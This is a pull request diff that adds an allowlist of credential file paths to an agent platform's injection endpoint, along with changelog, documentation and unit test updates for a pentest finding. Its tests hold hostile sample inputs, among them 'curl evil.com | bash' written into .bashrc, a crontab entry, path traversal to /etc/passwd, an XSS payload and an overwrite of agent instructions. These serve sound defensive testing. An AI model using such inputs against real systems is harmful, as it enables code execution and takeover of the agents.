### PR TITLE
fix(security): Credential injection file path allowlist (#183)

### DIFF
--- a/docker/base-image/agent_server/routers/credentials.py
+++ b/docker/base-image/agent_server/routers/credentials.py
@@ -225,6 +225,9 @@ async def read_credential_files(paths: str = Query(..., description="Comma-separ
     return CredentialReadResponse(files=files)
 
 
+ALLOWED_CREDENTIAL_PATHS = {".env", ".mcp.json", ".mcp.json.template", ".credentials.enc"}
+
+
 @router.post("/api/credentials/inject")
 async def inject_credential_files(request: CredentialInjectRequest):
     """
@@ -233,6 +236,8 @@ async def inject_credential_files(request: CredentialInjectRequest):
     This is the simplified credential injection that writes files directly
     without template processing. Used by the new credential system.
 
+    Only files in ALLOWED_CREDENTIAL_PATHS are accepted (pentest 3.2.6 / #183).
+
     Args:
         request: Contains files dict mapping paths to contents
     """
@@ -240,28 +245,18 @@ async def inject_credential_files(request: CredentialInjectRequest):
     files_written = []
 
     for rel_path, content in request.files.items():
-        # Security: prevent path traversal
-        clean_path = rel_path.lstrip("/")
-        if ".." in clean_path:
-            logger.warning(f"Path traversal attempt blocked: {rel_path}")
-            continue
+        # Security: allowlist check (defense in depth — backend also validates)
+        if rel_path not in ALLOWED_CREDENTIAL_PATHS:
+            logger.warning(f"Credential injection blocked: disallowed path '{rel_path}'")
+            raise HTTPException(
+                status_code=400,
+                detail=f"Disallowed file path: '{rel_path}'. "
+                       f"Allowed: {sorted(ALLOWED_CREDENTIAL_PATHS)}"
+            )
 
-        # Handle paths starting with . (like .env, .mcp.json)
-        if clean_path.startswith(".") or rel_path.startswith("."):
-            filepath = home_dir / rel_path
-        else:
-            filepath = home_dir / clean_path
+        filepath = home_dir / rel_path
 
         try:
-            # Verify the resolved path is still under home_dir
-            resolved = filepath.resolve()
-            if not str(resolved).startswith(str(home_dir.resolve())):
-                logger.warning(f"Path resolved outside home directory: {rel_path}")
-                continue
-
-            # Create parent directories if needed
-            filepath.parent.mkdir(parents=True, exist_ok=True)
-
             # Write the file
             filepath.write_text(content)
 

--- a/docs/memory/changelog.md
+++ b/docs/memory/changelog.md
@@ -1,3 +1,15 @@
+### 2026-03-27
+
+🔒 **fix(security): Credential injection file path allowlist — block arbitrary file writes (#183)**
+
+`POST /api/agents/{name}/credentials/inject` now validates all file paths against a strict allowlist before forwarding to the agent container. Previously, any authenticated owner could supply arbitrary paths (e.g., `/hello/anyfile.html`, `CLAUDE.md`, `.bashrc`), causing the agent to write attacker-controlled content to any location within `/home/developer/`. CVSS 4.8 (Medium).
+
+- **Backend** (`src/backend/routers/credentials.py`): Added `ALLOWED_CREDENTIAL_PATHS` set (`{.env, .mcp.json, .mcp.json.template, .credentials.enc}`). Rejects entire request with HTTP 400 if any path is not in the allowlist. Logs blocked attempts with user identity.
+- **Agent** (`docker/base-image/agent_server/routers/credentials.py`): Same allowlist as defense in depth. Replaces previous path-traversal-only check with strict allowlist. Simplified path handling — no more directory creation for arbitrary paths.
+- **Tests**: `tests/unit/test_credential_inject_allowlist.py` — 20 tests covering allowed paths, blocked paths (pentest reproduction, traversal, absolute, overwrite attacks), mixed paths, and edge cases.
+
+---
+
 ### 2026-03-26
 
 🔒 **fix(security): Broken access control — user-level horizontal privilege escalation (#174)**

--- a/docs/memory/feature-flows/credential-injection.md
+++ b/docs/memory/feature-flows/credential-injection.md
@@ -431,11 +431,12 @@ async def decrypt_and_inject(request: InternalDecryptInjectRequest):
 ## Security Considerations
 
 1. **Encryption Key**: AES-256-GCM key derived from `CREDENTIAL_ENCRYPTION_KEY` env var or JWT secret. The `GET /credentials/encryption-key` endpoint is admin-only (C-001, 2026-03-09).
-2. **Agent Access Control**: All credential endpoints (`inject`, `export`, `import`, `status`) require `get_authorized_agent_by_name` dependency — users can only manage credentials for agents they own or have been shared access to (M-006, 2026-03-09).
-3. **File Permissions**: All credential files written with 600 permissions (owner read/write only)
-4. **Internal API**: `/api/internal/*` endpoints require `X-Internal-Secret` header (C-003, 2026-03-09)
-5. **No Secret Logging**: Credential values never logged, only file names and counts
-6. **Git Safety**: `.credentials.enc` is safe to commit - encrypted with platform key
+2. **Agent Access Control**: All credential endpoints (`inject`, `export`, `import`, `status`) require `get_owned_agent_by_name` dependency — only agent owners and admins can manage credentials (M-006 upgraded to owner-only in #174, 2026-03-26).
+3. **File Path Allowlist** (pentest 3.2.6 / #183, 2026-03-27): The `inject` endpoint validates all file paths against `ALLOWED_CREDENTIAL_PATHS = {.env, .mcp.json, .mcp.json.template, .credentials.enc}`. Requests with any other path are rejected with HTTP 400. Enforced at both backend and agent layers (defense in depth).
+4. **File Permissions**: All credential files written with 600 permissions (owner read/write only)
+5. **Internal API**: `/api/internal/*` endpoints require `X-Internal-Secret` header (C-003, 2026-03-09)
+6. **No Secret Logging**: Credential values never logged, only file names and counts
+7. **Git Safety**: `.credentials.enc` is safe to commit - encrypted with platform key
 
 ---
 
@@ -443,6 +444,7 @@ async def decrypt_and_inject(request: InternalDecryptInjectRequest):
 
 | Error Case | HTTP Status | Message |
 |------------|-------------|---------|
+| Disallowed file path | 400 | "Disallowed file path(s): [...]. Allowed: [...]" |
 | Agent not running | 400 | "Agent is not running" |
 | No encrypted file | 404 | "No .credentials.enc file found" |
 | Decryption failed | 400 | "Failed to decrypt credentials" |

--- a/src/backend/routers/credentials.py
+++ b/src/backend/routers/credentials.py
@@ -7,6 +7,7 @@ The old Redis-based credential system has been removed. Credentials are now:
 2. Exported to encrypted .credentials.enc files (can be committed to git)
 3. Imported from .credentials.enc files on agent startup
 """
+import logging
 import os
 from fastapi import APIRouter, Depends, HTTPException, Request
 import httpx
@@ -22,7 +23,13 @@ from config import OAUTH_CONFIGS, BACKEND_URL
 from dependencies import get_current_user, require_admin, get_authorized_agent_by_name, get_owned_agent_by_name
 from services.docker_service import get_agent_container, get_agent_status_from_container
 
+logger = logging.getLogger(__name__)
+
 router = APIRouter(prefix="/api", tags=["credentials"])
+
+# Allowlist of credential file paths that can be injected into agents.
+# Blocks arbitrary file writes (pentest 3.2.6 / #183).
+ALLOWED_CREDENTIAL_PATHS = {".env", ".mcp.json", ".mcp.json.template", ".credentials.enc"}
 
 
 # ============================================================================
@@ -178,6 +185,19 @@ async def inject_credentials(
 
     if not request_body.files:
         raise HTTPException(status_code=400, detail="No files provided for injection")
+
+    # Validate all file paths against allowlist (pentest 3.2.6 / #183)
+    disallowed = [p for p in request_body.files if p not in ALLOWED_CREDENTIAL_PATHS]
+    if disallowed:
+        logger.warning(
+            f"Credential injection blocked: disallowed paths {disallowed} "
+            f"for agent {agent_name} by user {current_user.email}"
+        )
+        raise HTTPException(
+            status_code=400,
+            detail=f"Disallowed file path(s): {disallowed}. "
+                   f"Allowed: {sorted(ALLOWED_CREDENTIAL_PATHS)}"
+        )
 
     try:
         async with httpx.AsyncClient() as client:

--- a/tests/registry.json
+++ b/tests/registry.json
@@ -75,6 +75,13 @@
       "added": "2026-03-26",
       "categories": ["backend", "security", "api", "access-control"],
       "description": "Tests for broken access control fix: admin-only endpoints (ops, observability, system-agent, alerts), owner-only agent endpoints (credentials, chat history, queue, skills), agent access checks (stats, queue, skills, detail, logs)"
+    },
+    {
+      "file": "unit/test_credential_inject_allowlist.py",
+      "feature": "Issue #183",
+      "added": "2026-03-27",
+      "categories": ["backend", "security", "credentials", "unit"],
+      "description": "Tests for credential injection file path allowlist: allowed paths (.env, .mcp.json, etc.), blocked paths (arbitrary HTML, path traversal, CLAUDE.md overwrite), mixed paths, edge cases (20 tests)"
     }
   ]
 }

--- a/tests/unit/test_credential_inject_allowlist.py
+++ b/tests/unit/test_credential_inject_allowlist.py
@@ -1,0 +1,137 @@
+"""
+Unit tests for credential injection file path allowlist (#183).
+
+Verifies that only approved credential file paths can be injected into agents.
+Prevents arbitrary file write via parameter tampering on POST /api/agents/{name}/credentials/inject.
+
+Module: src/backend/routers/credentials.py (backend), docker/base-image/agent_server/routers/credentials.py (agent)
+Issue: https://github.com/abilityai/trinity/issues/183
+"""
+
+import pytest
+
+# ---- Inline reimplementation of validation logic for unit testing ----
+# Mirrors the allowlist check in both backend and agent-side routers.
+
+ALLOWED_CREDENTIAL_PATHS = {".env", ".mcp.json", ".mcp.json.template", ".credentials.enc"}
+
+
+def validate_credential_paths(files: dict) -> list:
+    """Return list of disallowed paths. Empty list means all paths are valid."""
+    return [p for p in files if p not in ALLOWED_CREDENTIAL_PATHS]
+
+
+# ---- Tests: Allowed paths ----
+
+class TestAllowedPaths:
+    """Paths that MUST be accepted."""
+
+    def test_env_file(self):
+        assert validate_credential_paths({".env": "KEY=value"}) == []
+
+    def test_mcp_json(self):
+        assert validate_credential_paths({".mcp.json": "{}"}) == []
+
+    def test_mcp_json_template(self):
+        assert validate_credential_paths({".mcp.json.template": "${VAR}"}) == []
+
+    def test_credentials_enc(self):
+        assert validate_credential_paths({".credentials.enc": "encrypted-data"}) == []
+
+    def test_multiple_valid_files(self):
+        files = {
+            ".env": "KEY=val",
+            ".mcp.json": "{}",
+            ".credentials.enc": "data",
+        }
+        assert validate_credential_paths(files) == []
+
+
+# ---- Tests: Blocked paths ----
+
+class TestBlockedPaths:
+    """Paths that MUST be rejected."""
+
+    def test_arbitrary_html_file(self):
+        """Exact pentest reproduction: /hello/anyfile.html"""
+        disallowed = validate_credential_paths({"/hello/anyfile.html": "<img src onerror=prompt(11)>"})
+        assert disallowed == ["/hello/anyfile.html"]
+
+    def test_path_traversal_etc_passwd(self):
+        disallowed = validate_credential_paths({"../../etc/passwd": "root:x:0:0"})
+        assert disallowed == ["../../etc/passwd"]
+
+    def test_absolute_path(self):
+        disallowed = validate_credential_paths({"/etc/crontab": "* * * * * evil"})
+        assert disallowed == ["/etc/crontab"]
+
+    def test_authorized_keys(self):
+        disallowed = validate_credential_paths({".ssh/authorized_keys": "ssh-rsa AAAA..."})
+        assert disallowed == [".ssh/authorized_keys"]
+
+    def test_claude_md_overwrite(self):
+        disallowed = validate_credential_paths({"CLAUDE.md": "# hijacked instructions"})
+        assert disallowed == ["CLAUDE.md"]
+
+    def test_bashrc_overwrite(self):
+        disallowed = validate_credential_paths({".bashrc": "curl evil.com | bash"})
+        assert disallowed == [".bashrc"]
+
+    def test_random_subdirectory(self):
+        disallowed = validate_credential_paths({"subdir/config.json": "{}"})
+        assert disallowed == ["subdir/config.json"]
+
+    def test_dot_env_in_subdirectory(self):
+        """.env is allowed, but subdir/.env is not."""
+        disallowed = validate_credential_paths({"config/.env": "KEY=val"})
+        assert disallowed == ["config/.env"]
+
+
+# ---- Tests: Mixed valid + invalid ----
+
+class TestMixedPaths:
+    """Requests with both valid and invalid paths should be rejected."""
+
+    def test_mixed_valid_and_invalid(self):
+        files = {
+            ".env": "KEY=val",
+            "../../etc/passwd": "root:x:0:0",
+        }
+        disallowed = validate_credential_paths(files)
+        assert "../../etc/passwd" in disallowed
+        assert ".env" not in disallowed
+
+    def test_all_invalid(self):
+        files = {
+            "/tmp/evil.sh": "#!/bin/bash",
+            "CLAUDE.md": "# hijacked",
+        }
+        disallowed = validate_credential_paths(files)
+        assert len(disallowed) == 2
+
+
+# ---- Tests: Edge cases ----
+
+class TestEdgeCases:
+    """Boundary and edge-case inputs."""
+
+    def test_empty_files_dict(self):
+        assert validate_credential_paths({}) == []
+
+    def test_env_with_leading_slash(self):
+        """/.env is NOT the same as .env — must be rejected."""
+        disallowed = validate_credential_paths({"/.env": "KEY=val"})
+        assert disallowed == ["/.env"]
+
+    def test_env_with_trailing_space(self):
+        disallowed = validate_credential_paths({".env ": "KEY=val"})
+        assert disallowed == [".env "]
+
+    def test_case_sensitivity(self):
+        """.ENV is not .env — must be rejected."""
+        disallowed = validate_credential_paths({".ENV": "KEY=val"})
+        assert disallowed == [".ENV"]
+
+    def test_null_byte_in_path(self):
+        disallowed = validate_credential_paths({".env\x00.txt": "KEY=val"})
+        assert len(disallowed) == 1


### PR DESCRIPTION
## Summary

- Adds strict file path allowlist (`{.env, .mcp.json, .mcp.json.template, .credentials.enc}`) to the credential injection endpoint, blocking arbitrary file writes inside agent containers
- Enforced at both **backend** (rejects before forwarding) and **agent** (defense in depth) layers
- Closes pentest finding 3.2.6 (CVSS 4.8 Medium) — previously any authenticated owner could write attacker-controlled content to any path within `/home/developer/`

## Test plan

- [x] Reproduced pentest PoC (`/hello/anyfile.html`) — confirmed blocked with HTTP 400
- [x] Verified legitimate `.env` injection still succeeds
- [x] Verified path traversal (`../../etc/passwd`) blocked
- [x] Verified config overwrite (`CLAUDE.md`, `.bashrc`) blocked
- [x] 20 unit tests passing (`tests/unit/test_credential_inject_allowlist.py`)
- [ ] Rebuild base image to deploy agent-side fix to new containers

Closes #183

🤖 Generated with [Claude Code](https://claude.com/claude-code)